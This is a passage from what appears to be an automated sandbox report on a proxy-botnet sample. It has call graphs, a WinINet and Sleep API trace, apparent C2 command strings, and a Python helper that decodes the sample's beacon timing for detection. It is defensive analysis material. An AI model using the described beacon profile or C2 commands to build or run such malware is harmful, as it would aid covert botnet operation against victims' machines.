MultiByteToWideChar 18884->18883 18886 405c11 18884->18886 18885->18883 18885->18884 18886->18883 18887 405c47 MultiByteToWideChar 18886->18887 18887->18883 18888 405c60 LCMapStringW 18887->18888 18888->18883 18889 405c7b 18888->18889 18890 405c81 18889->18890 18892 405cc1 18889->18892 18890->18883 18891 405c8f LCMapStringW 18890->18891 18891->18883 18892->18883 18893 405cf9 LCMapStringW 18892->18893 18893->18883 18894 405d11 WideCharToMultiByte 18893->18894 18894->18883 18905 402e82 18896->18905 18899 403018 18900 403021 18899->18900 18901 403026 18899->18901 18942 404bc0 18900->18942 18948 404bf9 18901->18948 18906 402e7f 18905->18906 18908 402e89 18905->18908 18906->18746 18906->18899 18908->18906 18909 402eae 18908->18909 18910 402ed2 18909->18910 18911 402ebd 18909->18911 18913 402f11 HeapAlloc 18910->18913 18917 402ecb 18910->18917 18924 403e00 18910->18924 18911->18917 18918 403653 18911->18918 18914 402f20 18913->18914 18914->18908 18915 402ed0 18915->18908 18917->18913 18917->18914 18917->18915 18921 403685 18918->18921 18919 403724 18923 403733 18919->18923 18938 403a0d 18919->18938 18921->18919 18921->18923 18931 40395c 18921->18931 18923->18917 18929 403e0e 18924->18929 18925 403efa VirtualAlloc 18930 403ecb 18925->18930 18926 403fcf 18927 403b08 5 API calls 18926->18927 18927->18930 18929->18925 18929->18926 18929->18930 18930->18917 18932 40399f HeapAlloc 18931->18932 18933 40396f HeapReAlloc 18931->18933 18935 4039ef 18932->18935 18936 4039c5 VirtualAlloc 18932->18936 18934 40398e 18933->18934 18933->18935 18934->18932 18935->18919 18936->18935 18937 4039df HeapFree 18936->18937 18937->18935 18939 403a1f VirtualAlloc 18938->18939 18941 403a68 18939->18941 18941->18923 18943 404bca 18942->18943 18944 404bf9 7 API calls 18943->18944 18947 404bf7 18943->18947 18945 404be1 18944->18945 18946 404bf9 7 API calls 18945->18946 18946->18947 18947->18901 18950 404c0c 18948->18950 18949 404d23 18952 404d36 GetStdHandle WriteFile 18949->18952 18950->18949 18951 
404c4c 18950->18951 18956 40302f 18950->18956 18953 404c58 GetModuleFileNameA 18951->18953 18951->18956 18952->18956 18954 404c70 18953->18954 18957 405857 18954->18957 18956->18746 18958 405864 LoadLibraryA 18957->18958 18960 4058a6 18957->18960 18959 405875 GetProcAddress 18958->18959 18958->18960 18959->18960 18961 40588c GetProcAddress GetProcAddress 18959->18961 18960->18956 18961->18960 18963 403089 18962->18963 18964 40306d 18962->18964 18963->18776 18965 403077 18964->18965 18966 40308d 18964->18966 18968 4030b9 HeapFree 18965->18968 18969 403083 18965->18969 18967 4030b8 18966->18967 18971 4030a7 18966->18971 18967->18968 18968->18963 18973 40332a 18969->18973 18979 403dbb 18971->18979 18975 403368 18973->18975 18978 40361e 18973->18978 18974 403564 VirtualFree 18976 4035c8 18974->18976 18975->18974 18975->18978 18977 4035d7 VirtualFree HeapFree 18976->18977 18976->18978 18977->18978 18978->18963 18980 403dfe 18979->18980 18981 403de8 18979->18981 18980->18963 18981->18980 18983 403ca2 18981->18983 18986 403caf 18983->18986 18984 403d5f 18984->18980 18985 403cd0 VirtualFree 18985->18986 18986->18984 18986->18985 18988 403c4c VirtualFree 18986->18988 18989 403c69 18988->18989 18990 403c99 18989->18990 18991 403c79 HeapFree 18989->18991 18990->18986 18991->18986 18993 405844 18992->18993 18994 40584b 18992->18994 18996 405477 18993->18996 18994->18782 19003 405610 18996->19003 18998 405604 18998->18994 19001 4054ba GetCPInfo 19002 4054ce 19001->19002 19002->18998 19008 4056b6 GetCPInfo 19002->19008 19004 405630 19003->19004 19005 405620 GetOEMCP 19003->19005 19006 405488 19004->19006 19007 405635 GetACP 19004->19007 19005->19004 19006->18998 19006->19001 19006->19002 19007->19006 19009 4057a1 19008->19009 19011 4056d9 19008->19011 19009->18998 19010 405d6e 6 API calls 19012 405755 19010->19012 19011->19010 19013 405b1f 9 API calls 19012->19013 19014 405779 19013->19014 19015 405b1f 9 API calls 19014->19015 19015->19009 19017 404187 GetCurrentProcess 
TerminateProcess 19016->19017 19018 404198 19016->19018 19017->19018 19019 402ff9 19018->19019 19020 404202 ExitProcess 19018->19020 19019->18815 19021 402223 19022 40b055 19021->19022 19023 4022ba 19022->19023 19025 401f64 FindResourceA 19022->19025 19026 401f86 GetLastError SizeofResource 19025->19026 19031 401f9f 19025->19031 19027 401fa6 LoadResource LockResource GlobalAlloc 19026->19027 19026->19031 19028 401fd2 19027->19028 19029 401ffb GetTickCount 19028->19029 19032 402005 GlobalAlloc 19029->19032 19031->19023 19032->19031 19033 9ff8da LoadLibraryA 19034 9ff9bd 19033->19034 19035 9ff903 GetProcAddress 19033->19035 19036 9ff9b6 FreeLibrary 19035->19036 19039 9ff917 19035->19039 19036->19034 19037 9ff929 GetAdaptersInfo 19037->19039 19038 9ff9b1 19038->19036 19039->19037 19039->19038 19041 a03a8f 19039->19041 19044 a03a97 19041->19044 19042 a02eec _malloc 59 API calls 19042->19044 19043 a03ab1 19043->19039 19044->19042 19044->19043 19045 a08143 _malloc RtlDecodePointer 19044->19045 19046 a03ab5 std::exception::exception 19044->19046 19045->19044 19049 a0449a 19046->19049 19048 a03adf 19051 a044b9 RaiseException 19049->19051 19051->19048 19052 a6020e 19053 a6afb3 DeleteFileA 19052->19053 19055 9ff7d6 CreateFileA 19056 9ff8d2 19055->19056 19059 9ff807 19055->19059 19057 9ff81f DeviceIoControl 19057->19059 19058 9ff8c8 FindCloseChangeNotification 19058->19056 19059->19057 19059->19058 19060 9ff894 GetLastError 19059->19060 19061 a03a8f _Allocate 60 API calls 19059->19061 19060->19058 19060->19059 19061->19059 19065 40b72c 19066 40b761 19065->19066 19067 40b6f2 Sleep 19066->19067 19068 40b775 19066->19068 19068->19068 19069 4024ec 19070 40b5ed WaitForSingleObject 19069->19070 19072 40b66d 19073 40b673 Sleep 19072->19073 19074 40b93b 19073->19074 19075 40b00d RegCreateKeyExA 19076 40b01b 19075->19076 19077 40226e 19078 4022bb 19077->19078 19079 40227b 19077->19079 19080 40b414 lstrcmpiW 19079->19080 19081 402283 19079->19081 19080->19081 19082 40b8ce 19083 40b8d3 
LoadLibraryExA 19082->19083 19084 4021e1 19083->19084 19085 40b2ef 19086 40b2f5 VirtualAlloc 19085->19086 19087 40b359 19085->19087 19086->19087 19087->19087 19088 a35af3 19089 a455dc CreateFileA 19088->19089 19090 a827c6 19089->19090 19091 a5a835 19092 a5e3b9 19091->19092 19094 a02eec 59 API calls 19092->19094 19093 a5e3be 19095 a02eec 59 API calls 19093->19095 19094->19093 19095->19093 19096 9f104d 19097 a032e7 __cinit 68 API calls 19096->19097 19098 9f1057 19097->19098 19101 9f1aa9 InterlockedIncrement 19098->19101 19102 9f105c 19101->19102 19103 9f1ac5 WSAStartup InterlockedExchange 19101->19103 19103->19102 19104 9f6487 RtlInitializeCriticalSection GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress 19182 9f42c7 19104->19182 19183 9f72a7 InternetOpenA 19184 9f72c5 InternetSetOptionA InternetSetOptionA InternetSetOptionA 19183->19184 19196 9f66f0 shared_ptr __gmtime64_s 19183->19196 19190 9f733e __gmtime64_s 19184->19190 19185 9f731e InternetOpenUrlA 19186 9f737e InternetCloseHandle 19185->19186 19185->19190 19186->19196 19187 9f670a RtlEnterCriticalSection RtlLeaveCriticalSection 19187->19196 19188 9f6704 Sleep 19188->19187 19189 9f7342 InternetReadFile 19189->19190 19191 9f7373 InternetCloseHandle 19189->19191 19190->19185 19190->19189 19191->19186 19192 9f73e5 RtlEnterCriticalSection RtlLeaveCriticalSection 19294 a0227c 19192->19294 19194 a02eec _malloc 59 API calls 19195 9f7499 RtlEnterCriticalSection RtlLeaveCriticalSection 19194->19195 19195->19196 19196->19183 19196->19187 19196->19188 19196->19192 19196->19194 19197 9f7766 RtlEnterCriticalSection RtlLeaveCriticalSection 19196->19197 19199 a0227c 66 API calls 19196->19199 19202 9f78de RtlEnterCriticalSection 19196->19202 19203 9f790b RtlLeaveCriticalSection 19196->19203 19206 a02eec 59 API calls _malloc 19196->19206 19207 a02eb4 59 API calls _free 19196->19207 19210 a03529 60 API calls _strtok 19196->19210 19213 a03a8f _Allocate 60 API calls 19196->19213 19218 9fa658 73 API calls 19196->19218 
API calls 20616->20619 20630 a03a36 20617->20630 20620 a0396f 20618->20620 20621 a0398a 20619->20621 20622 a04e35 __gmtime64_s 9 API calls 20620->20622 20633 a0b1db 20621->20633 20622->20617 20625 a09d71 __fflush_nolock 59 API calls 20626 a03998 20625->20626 20637 a0b066 20626->20637 20628 a0399e 20628->20617 20629 a02eb4 _free 59 API calls 20628->20629 20629->20617 20631 a097a1 __fsopen 2 API calls 20630->20631 20632 a03a3c 20631->20632 20632->20437 20634 a03992 20633->20634 20635 a0b1e8 20633->20635 20634->20625 20635->20634 20636 a02eb4 _free 59 API calls 20635->20636 20636->20634 20638 a0b072 __fcloseall 20637->20638 20639 a0b096 20638->20639 20640 a0b07f 20638->20640 20641 a0b121 20639->20641 20643 a0b0a6 20639->20643 20642 a05d67 __lseeki64 59 API calls 20640->20642 20644 a05d67 __lseeki64 59 API calls 20641->20644 20645 a0b084 20642->20645 20646 a0b0c4 20643->20646 20647 a0b0ce 20643->20647 20648 a0b0c9 20644->20648 20649 a05d9b _malloc 59 API calls 20645->20649 20650 a05d67 __lseeki64 59 API calls 20646->20650 20651 a10bc7 ___lock_fhandle 60 API calls 20647->20651 20652 a05d9b _malloc 59 API calls 20648->20652 20659 a0b08b __fcloseall 20649->20659 20650->20648 20653 a0b0d4 20651->20653 20654 a0b12d 20652->20654 20655 a0b0f2 20653->20655 20656 a0b0e7 20653->20656 20657 a04e35 __gmtime64_s 9 API calls 20654->20657 20660 a05d9b _malloc 59 API calls 20655->20660 20663 a0b141 20656->20663 20657->20659 20659->20628 20661 a0b0ed 20660->20661 20678 a0b119 20661->20678 20664 a10e84 __lseeki64_nolock 59 API calls 20663->20664 20667 a0b14f 20664->20667 20665 a0b1a5 20681 a10dfe 20665->20681 20667->20665 20668 a0b183 20667->20668 20670 a10e84 __lseeki64_nolock 59 API calls 20667->20670 20668->20665 20671 a10e84 __lseeki64_nolock 59 API calls 20668->20671 20673 a0b17a 20670->20673 20674 a0b18f CloseHandle 20671->20674 20672 a0b1cf 20672->20661 20676 a10e84 __lseeki64_nolock 59 API calls 20673->20676 20674->20665 20677 a0b19b GetLastError 20674->20677 20675 a05d7a 
__dosmaperr 59 API calls 20675->20672 20676->20668 20677->20665 20690 a10f6d RtlLeaveCriticalSection 20678->20690 20680 a0b11f 20680->20659 20682 a10e6a 20681->20682 20683 a10e0a 20681->20683 20684 a05d9b _malloc 59 API calls 20682->20684 20683->20682 20688 a10e33 20683->20688 20685 a10e6f 20684->20685 20686 a05d67 __lseeki64 59 API calls 20685->20686 20687 a0b1ad 20686->20687 20687->20672 20687->20675 20688->20687 20689 a10e55 SetStdHandle 20688->20689 20689->20687 20690->20680 20691 4026ba 20692 40b0d5 RegSetValueExA 20691->20692 20694 40bba1 RegCloseKey 20692->20694 20695 40bba7 20694->20695 20696 40223c GetCommandLineW 20697 40b040 CommandLineToArgvW 20696->20697 20698 40b942 GetLocalTime 20697->20698 20701 401f27 20698->20701 20702 401f3c 20701->20702 20705 401a1d 20702->20705 20704 401f45 20706 401a2c 20705->20706 20711 401a4f CreateFileA 20706->20711 20710 401a3e 20710->20704 20712 401a35 20711->20712 20713 401a7d 20711->20713 20719 401b4b LoadLibraryA 20712->20719 20714 401a98 DeviceIoControl 20713->20714 20716 401b3a FindCloseChangeNotification 20713->20716 20717 401b0e GetLastError 20713->20717 20728 402cb6 20713->20728 20731 402ca8 20713->20731 20714->20713 20716->20712 20717->20713 20717->20716 20720 401c21 20719->20720 20721 401b6e GetProcAddress 20719->20721 20720->20710 20722 401c18 FreeLibrary 20721->20722 20726 401b85 20721->20726 20722->20720 20723 401b95 GetAdaptersInfo 20723->20726 20724 402cb6 7 API calls 20724->20726 20725 401c15 20725->20722 20726->20723 20726->20724 20726->20725 20727 402ca8 12 API calls 20726->20727 20727->20726 20729 403061 7 API calls 20728->20729 20730 402cbf 20729->20730 20730->20713 20732 402e82 12 API calls 20731->20732 20733 402cb3 20732->20733 20733->20713

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 0 9f72a7-9f72bf InternetOpenA 1 9f7385-9f738b 0->1 2 9f72c5-9f7319 InternetSetOptionA * 3 call a04a30 0->2 3 9f738d-9f7393 1->3 4 9f73a7-9f73b5 1->4 10 9f731e-9f733c InternetOpenUrlA 2->10 6 9f7399-9f73a6 call 9f53ec 3->6 7 9f7395-9f7397 3->7 8 9f73bb-9f73df call a04a30 call 9f439c 4->8 9 9f66f0-9f66f2 4->9 6->4 7->4 8->9 33 9f73e5-9f7413 RtlEnterCriticalSection RtlLeaveCriticalSection call a0227c 8->33 13 9f66fb-9f66fd 9->13 14 9f66f4-9f66f9 9->14 15 9f737e-9f737f InternetCloseHandle 10->15 16 9f733e 10->16 18 9f66ff 13->18 19 9f670a-9f673e RtlEnterCriticalSection RtlLeaveCriticalSection 13->19 21 9f6704 Sleep 14->21 15->1 22 9f7342-9f7368 InternetReadFile 16->22 18->21 26 9f678e 19->26 27 9f6740-9f674c 19->27 21->19 24 9f736a-9f7371 22->24 25 9f7373-9f737a InternetCloseHandle 22->25 24->22 25->15 29 9f6792 26->29 27->26 28 9f674e-9f675b 27->28 31 9f675d-9f6761 28->31 32 9f6763-9f6764 28->32 29->0 34 9f6768-9f678c call a04a30 * 2 31->34 32->34 38 9f7469-9f7484 call a0227c 33->38 39 9f7415-9f7427 call a0227c 33->39 34->29 48 9f773e-9f7750 call a0227c 38->48 49 9f748a-9f748c 38->49 39->38 47 9f7429-9f743b call a0227c 39->47 47->38 59 9f743d-9f744f call a0227c 47->59 56 9f7799-9f77a2 call a0227c 48->56 57 9f7752-9f7754 48->57 49->48 51 9f7492-9f7544 call a02eec RtlEnterCriticalSection RtlLeaveCriticalSection call a04a30 * 5 call 9f439c * 2 49->51 112 9f7546-9f7548 51->112 113 9f7581 51->113 66 9f77a7-9f77ab 56->66 57->56 60 9f7756-9f7794 call a04a30 RtlEnterCriticalSection RtlLeaveCriticalSection 57->60 59->38 72 9f7451-9f7463 call a0227c 59->72 60->9 70 9f77ad-9f77bb call 9f61f1 call 9f62ff 66->70 71 9f77cc-9f77de call a0227c 66->71 87 9f77c0-9f77c7 call 9f640a 70->87 81 9f7afc-9f7b0e call a0227c 71->81 82 9f77e4-9f77e6 71->82 72->9 72->38 81->9 93 9f7b14-9f7b42 call a02eec call a04a30 call 9f439c 81->93 82->81 85 9f77ec-9f7803 call 9f439c 82->85 85->9 98 9f7809-9f78d7 call 
a02358 call 9f1ba7 85->98 87->9 118 9f7b4b-9f7b52 call a02eb4 93->118 119 9f7b44-9f7b46 call 9f534d 93->119 115 9f78de-9f78ff RtlEnterCriticalSection 98->115 116 9f78d9 call 9f143f 98->116 112->113 117 9f754a-9f755c call a0227c 112->117 120 9f7585-9f75b3 call a02eec call a04a30 call 9f439c 113->120 122 9f790b-9f7941 RtlLeaveCriticalSection call 9f3c67 call 9f3d7e 115->122 123 9f7901-9f7908 115->123 116->115 117->113 134 9f755e-9f757f call 9f439c 117->134 118->9 119->118 144 9f75b5-9f75c4 call a03529 120->144 145 9f75f4-9f75fd call a02eb4 120->145 136 9f7946-9f7963 call 9f826e 122->136 123->122 134->120 142 9f7968-9f796f 136->142 146 9f7975-9f79af call 9fa658 142->146 147 9f7ae3-9f7af7 call 9f8f36 142->147 144->145 156 9f75c6 144->156 159 9f7734-9f7737 145->159 160 9f7603-9f761b call a03a8f 145->160 153 9f79b4-9f79bd 146->153 147->9 157 9f7aad-9f7ade call 9f831d call 9f33b2 153->157 158 9f79c3-9f79ca 153->158 161 9f75cb-9f75dd call a02790 156->161 157->147 163 9f79cd-9f79d2 158->163 159->48 169 9f761d-9f7625 call 9f966a 160->169 170 9f7627 160->170 176 9f75df 161->176 177 9f75e2-9f75f2 call a03529 161->177 163->163 168 9f79d4-9f7a11 call 9fa658 163->168 178 9f7a16-9f7a1f 168->178 175 9f7629-9f765d call 9fa782 call 9f3863 169->175 170->175 189 9f7662-9f767e call 9f5119 175->189 176->177 177->145 177->161 178->157 182 9f7a25-9f7a2b 178->182 183 9f7a2e-9f7a33 182->183 183->183 186 9f7a35-9f7a70 call 9fa658 183->186 186->157 192 9f7a72-9f7aa6 call 9fd04a 186->192 193 9f7683-9f76b4 call 9f3863 call 9faa28 189->193 196 9f7aab-9f7aac 192->196 199 9f76b9-9f76cb call 9fab42 193->199 196->157 201 9f76d0-9f76e1 199->201 202 9f76e8-9f76f7 Sleep 201->202 203 9f76e3 call 9f380b 201->203 205 9f76ff-9f7713 call a01830 202->205 203->202 207 9f771f-9f772d 205->207 208 9f7715-9f771e call 9f4100 205->208 207->159 210 9f772f call 9f380b 207->210 208->207 210->159
                                                                          APIs
                                                                          • Sleep.KERNELBASE(0000EA60), ref: 009F6704
                                                                          • RtlEnterCriticalSection.NTDLL(00A271B8), ref: 009F670F
                                                                          • RtlLeaveCriticalSection.NTDLL(00A271B8), ref: 009F6720
                                                                          • InternetOpenA.WININET(?), ref: 009F72B1
                                                                          • InternetSetOptionA.WININET(00000000,00000002,?), ref: 009F72D9
                                                                          • InternetSetOptionA.WININET(00000000,00000005,00001388,00000004), ref: 009F72F1
                                                                          • InternetSetOptionA.WININET(00000000,00000006,00001388,00000004), ref: 009F7309
                                                                          • InternetOpenUrlA.WININET(00000000,?,?,000000FF,04000200), ref: 009F7332
                                                                          • InternetReadFile.WININET(00000000,?,00001000,?), ref: 009F7354
                                                                          • InternetCloseHandle.WININET(00000000), ref: 009F7374
                                                                          • InternetCloseHandle.WININET(00000000), ref: 009F737F
                                                                          • RtlEnterCriticalSection.NTDLL(00A271B8), ref: 009F73EA
                                                                          • RtlLeaveCriticalSection.NTDLL(00A271B8), ref: 009F73FB
                                                                          • _malloc.LIBCMT ref: 009F7494
                                                                          • RtlEnterCriticalSection.NTDLL(00A271B8), ref: 009F74A6
                                                                          • RtlLeaveCriticalSection.NTDLL(00A271B8), ref: 009F74B2
                                                                          • _malloc.LIBCMT ref: 009F758A
                                                                          • _strtok.LIBCMT ref: 009F75BB
                                                                          • _swscanf.LIBCMT ref: 009F75D2
                                                                          • _strtok.LIBCMT ref: 009F75E9
                                                                          • _free.LIBCMT ref: 009F75F5
                                                                          • Sleep.KERNEL32(000007D0), ref: 009F76ED
                                                                          • RtlEnterCriticalSection.NTDLL(00A271B8), ref: 009F776E
                                                                          • RtlLeaveCriticalSection.NTDLL(00A271B8), ref: 009F7780
                                                                          • _sprintf.LIBCMT ref: 009F781E
                                                                          • RtlEnterCriticalSection.NTDLL(00000020), ref: 009F78E2
                                                                          • RtlLeaveCriticalSection.NTDLL(00000020), ref: 009F7916
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2868320795.00000000009F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9f1000_codecpackupdate.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CriticalSection$Internet$EnterLeave$Option$CloseHandleOpenSleep_malloc_strtok$FileRead_free_sprintf_swscanf
                                                                          • String ID: $%d;$<htm$Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)$auth_ip$auth_swith$block$connect$disconnect$idle$updips$updurls$urls
                                                                          • API String ID: 1657546717-1839899575
                                                                          • Opcode ID: aa432bd4dc7a2c82af757c600a40636c866138876f6bbef5301badfbbfb23227
                                                                          • Instruction ID: eabc57592ba566f2e1739f9c6de0cdc913abe37619aacc9c1e37ffcb0d5e7cc7
                                                                          • Opcode Fuzzy Hash: aa432bd4dc7a2c82af757c600a40636c866138876f6bbef5301badfbbfb23227
                                                                          • Instruction Fuzzy Hash: EC32F07150C385AFD720AB64DC45BEFB7E9AF89310F10482DF689972A1EB709944CB52
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%
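The API list above records the C2 polling loop of the injected Socks5Systemz code with raw DWORD arguments only. What a practitioner wants to know is what those constants mean: the three InternetSetOptionA calls set the WinINet connect, send and receive timeouts (the second being 0x1388 = 5000 ms), the InternetOpenUrlA flag word 0x04000200 is INTERNET_FLAG_NO_CACHE_WRITE | INTERNET_FLAG_NO_UI, and the Sleep(0xEA60) at 009F6704 is the 60 second beacon interval. The following decoder is an added example and not part of the report or the sample; it parses the Joe Sandbox "API.MODULE(args), ref: addr" lines (copied verbatim from this function as constructed input) and resolves the option IDs and flag bits against the wininet.h values. Only the constants listed in the two tables are decoded; anything else is reported as a hex remainder.

```python
import re
from dataclasses import dataclass

# Constructed input: the WinINet and Sleep lines from the API list of the
# function above, copied verbatim from the report.
TRACE = """\
• Sleep.KERNELBASE(0000EA60), ref: 009F6704
• InternetOpenA.WININET(?), ref: 009F72B1
• InternetSetOptionA.WININET(00000000,00000002,?), ref: 009F72D9
• InternetSetOptionA.WININET(00000000,00000005,00001388,00000004), ref: 009F72F1
• InternetSetOptionA.WININET(00000000,00000006,00001388,00000004), ref: 009F7309
• InternetOpenUrlA.WININET(00000000,?,?,000000FF,04000200), ref: 009F7332
• InternetReadFile.WININET(00000000,?,00001000,?), ref: 009F7354
• Sleep.KERNEL32(000007D0), ref: 009F76ED
"""

# wininet.h option IDs (dwOption, the 2nd argument of InternetSetOptionA).
INTERNET_OPTIONS = {
    2: "INTERNET_OPTION_CONNECT_TIMEOUT",
    3: "INTERNET_OPTION_CONNECT_RETRIES",
    4: "INTERNET_OPTION_CONNECT_BACKOFF",
    5: "INTERNET_OPTION_SEND_TIMEOUT",
    6: "INTERNET_OPTION_RECEIVE_TIMEOUT",
    7: "INTERNET_OPTION_DATA_SEND_TIMEOUT",
    8: "INTERNET_OPTION_DATA_RECEIVE_TIMEOUT",
}
TIMEOUT_OPTIONS = {2, 5, 6, 7, 8}   # lpBuffer holds a DWORD of milliseconds

# wininet.h dwFlags bits (5th argument of InternetOpenUrlA).
INTERNET_FLAGS = {
    0x80000000: "INTERNET_FLAG_RELOAD",
    0x04000000: "INTERNET_FLAG_NO_CACHE_WRITE",
    0x00800000: "INTERNET_FLAG_SECURE",
    0x00400000: "INTERNET_FLAG_KEEP_CONNECTION",
    0x00200000: "INTERNET_FLAG_NO_AUTO_REDIRECT",
    0x00080000: "INTERNET_FLAG_NO_COOKIES",
    0x00040000: "INTERNET_FLAG_NO_AUTH",
    0x00002000: "INTERNET_FLAG_IGNORE_CERT_DATE_INVALID",
    0x00001000: "INTERNET_FLAG_IGNORE_CERT_CN_INVALID",
    0x00000200: "INTERNET_FLAG_NO_UI",
    0x00000100: "INTERNET_FLAG_PRAGMA_NOCACHE",
}

# One API line of the report: "<api>.<module>(<args>), ref: <address>"
LINE_RE = re.compile(r"(\w+)\.(\w+)\(([^)]*)\),\s*ref:\s*([0-9A-Fa-f]+)")
HEX_RE = re.compile(r"[0-9A-Fa-f]+")


@dataclass
class ApiCall:
    api: str
    module: str
    args: list      # int for hex literals, None where the trace shows '?'
    ref: int        # address of the call site


def parse_trace(text):
    """Turn the report's API list into ApiCall records."""
    calls = []
    for m in LINE_RE.finditer(text):
        api, module, raw_args, ref = m.groups()
        args = []
        for a in raw_args.split(","):
            a = a.strip()
            if a in ("", "?"):
                args.append(None)
            elif HEX_RE.fullmatch(a):
                args.append(int(a, 16))
            else:
                args.append(a)          # string literal shown inline by the plugin
        calls.append(ApiCall(api, module, args, int(ref, 16)))
    return calls


def decode_flags(value, table):
    """Split a DWORD into named bits; unknown bits are kept as one hex remainder."""
    names = [name for bit, name in table.items() if value & bit]
    known = 0
    for bit in table:
        known |= bit
    leftover = value & ~known & 0xFFFFFFFF
    if leftover:
        names.append(f"0x{leftover:08x}")
    return names


def describe(call):
    """Human-readable meaning of one traced call."""
    a = call.args
    if call.api == "InternetSetOptionA" and len(a) >= 2 and isinstance(a[1], int):
        name = INTERNET_OPTIONS.get(a[1], f"option {a[1]}")
        if a[1] in TIMEOUT_OPTIONS and len(a) >= 3 and isinstance(a[2], int):
            return f"{name} = {a[2]} ms"
        return name
    if call.api == "InternetOpenUrlA" and len(a) >= 5 and isinstance(a[4], int):
        return "dwFlags: " + " | ".join(decode_flags(a[4], INTERNET_FLAGS))
    if call.api == "Sleep" and a and isinstance(a[0], int):
        return f"sleep {a[0]} ms ({a[0] / 1000:g} s)"
    return call.api


def summarize(text):
    """[(call-site address, description)] for every line in the trace."""
    return [(f"{c.ref:08X}", describe(c)) for c in parse_trace(text)]


if __name__ == "__main__":
    for ref, what in summarize(TRACE):
        print(ref, what)
```

Run on the eight lines above it yields the polling profile directly: a 60 s sleep, 5 s send and receive timeouts, a single GET that bypasses the WinINet cache and suppresses any UI, 0x1000-byte InternetReadFile chunks, then a 2 s pause before the loop repeats. Those values are what to compare against proxy logs when hunting for the beacon rather than the raw DWORDs.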

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 213 9f6487-9f66ed RtlInitializeCriticalSection GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress call 9f42c7 GetTickCount call 9f605a GetVersionExA call a04a30 call a02eec * 8 GetProcessHeap RtlAllocateHeap GetProcessHeap RtlAllocateHeap GetProcessHeap RtlAllocateHeap call a04a30 * 3 RtlEnterCriticalSection RtlLeaveCriticalSection call a02eec * 4 QueryPerformanceCounter Sleep call a02eec * 2 call a04a30 * 2 258 9f66f0-9f66f2 213->258 259 9f66fb-9f66fd 258->259 260 9f66f4-9f66f9 258->260 261 9f66ff 259->261 262 9f670a-9f673e RtlEnterCriticalSection RtlLeaveCriticalSection 259->262 263 9f6704 Sleep 260->263 261->263 264 9f678e 262->264 265 9f6740-9f674c 262->265 263->262 267 9f6792-9f72bf InternetOpenA 264->267 265->264 266 9f674e-9f675b 265->266 268 9f675d-9f6761 266->268 269 9f6763-9f6764 266->269 272 9f7385-9f738b 267->272 273 9f72c5-9f733c InternetSetOptionA * 3 call a04a30 InternetOpenUrlA 267->273 271 9f6768-9f678c call a04a30 * 2 268->271 269->271 271->267 274 9f738d-9f7393 272->274 275 9f73a7-9f73b5 272->275 286 9f737e-9f737f InternetCloseHandle 273->286 287 9f733e 273->287 278 9f7399-9f73a6 call 9f53ec 274->278 279 9f7395-9f7397 274->279 275->258 281 9f73bb-9f73df call a04a30 call 9f439c 275->281 278->275 279->275 281->258 296 9f73e5-9f7413 RtlEnterCriticalSection RtlLeaveCriticalSection call a0227c 281->296 286->272 291 9f7342-9f7368 InternetReadFile 287->291 293 9f736a-9f7371 291->293 294 9f7373-9f737a InternetCloseHandle 291->294 293->291 294->286 299 9f7469-9f7484 call a0227c 296->299 300 9f7415-9f7427 call a0227c 296->300 306 9f773e-9f7750 call a0227c 299->306 307 9f748a-9f748c 299->307 300->299 305 9f7429-9f743b call a0227c 300->305 305->299 317 9f743d-9f744f call a0227c 305->317 314 9f7799-9f77ab call a0227c 306->314 315 9f7752-9f7754 306->315 307->306 309 9f7492-9f7544 call a02eec RtlEnterCriticalSection RtlLeaveCriticalSection call a04a30 * 5 
call 9f439c * 2 307->309 370 9f7546-9f7548 309->370 371 9f7581 309->371 328 9f77ad-9f77bb call 9f61f1 call 9f62ff 314->328 329 9f77cc-9f77de call a0227c 314->329 315->314 318 9f7756-9f7794 call a04a30 RtlEnterCriticalSection RtlLeaveCriticalSection 315->318 317->299 330 9f7451-9f7463 call a0227c 317->330 318->258 345 9f77c0-9f77c7 call 9f640a 328->345 339 9f7afc-9f7b0e call a0227c 329->339 340 9f77e4-9f77e6 329->340 330->258 330->299 339->258 351 9f7b14-9f7b42 call a02eec call a04a30 call 9f439c 339->351 340->339 343 9f77ec-9f7803 call 9f439c 340->343 343->258 356 9f7809-9f78d7 call a02358 call 9f1ba7 343->356 345->258 376 9f7b4b-9f7b52 call a02eb4 351->376 377 9f7b44-9f7b46 call 9f534d 351->377 373 9f78de-9f78ff RtlEnterCriticalSection 356->373 374 9f78d9 call 9f143f 356->374 370->371 375 9f754a-9f755c call a0227c 370->375 378 9f7585-9f75b3 call a02eec call a04a30 call 9f439c 371->378 380 9f790b-9f796f RtlLeaveCriticalSection call 9f3c67 call 9f3d7e call 9f826e 373->380 381 9f7901-9f7908 373->381 374->373 375->371 392 9f755e-9f757f call 9f439c 375->392 376->258 377->376 402 9f75b5-9f75c4 call a03529 378->402 403 9f75f4-9f75fd call a02eb4 378->403 404 9f7975-9f79bd call 9fa658 380->404 405 9f7ae3-9f7af7 call 9f8f36 380->405 381->380 392->378 402->403 414 9f75c6 402->414 417 9f7734-9f7737 403->417 418 9f7603-9f761b call a03a8f 403->418 415 9f7aad-9f7ade call 9f831d call 9f33b2 404->415 416 9f79c3-9f79ca 404->416 405->258 419 9f75cb-9f75dd call a02790 414->419 415->405 421 9f79cd-9f79d2 416->421 417->306 427 9f761d-9f7625 call 9f966a 418->427 428 9f7627 418->428 434 9f75df 419->434 435 9f75e2-9f75f2 call a03529 419->435 421->421 426 9f79d4-9f7a1f call 9fa658 421->426 426->415 440 9f7a25-9f7a2b 426->440 433 9f7629-9f76cb call 9fa782 call 9f3863 call 9f5119 call 9f3863 call 9faa28 call 9fab42 427->433 428->433 459 9f76d0-9f76e1 433->459 434->435 435->403 435->419 441 9f7a2e-9f7a33 440->441 441->441 444 9f7a35-9f7a70 call 9fa658 441->444 444->415 450 9f7a72-9f7aa6 call 
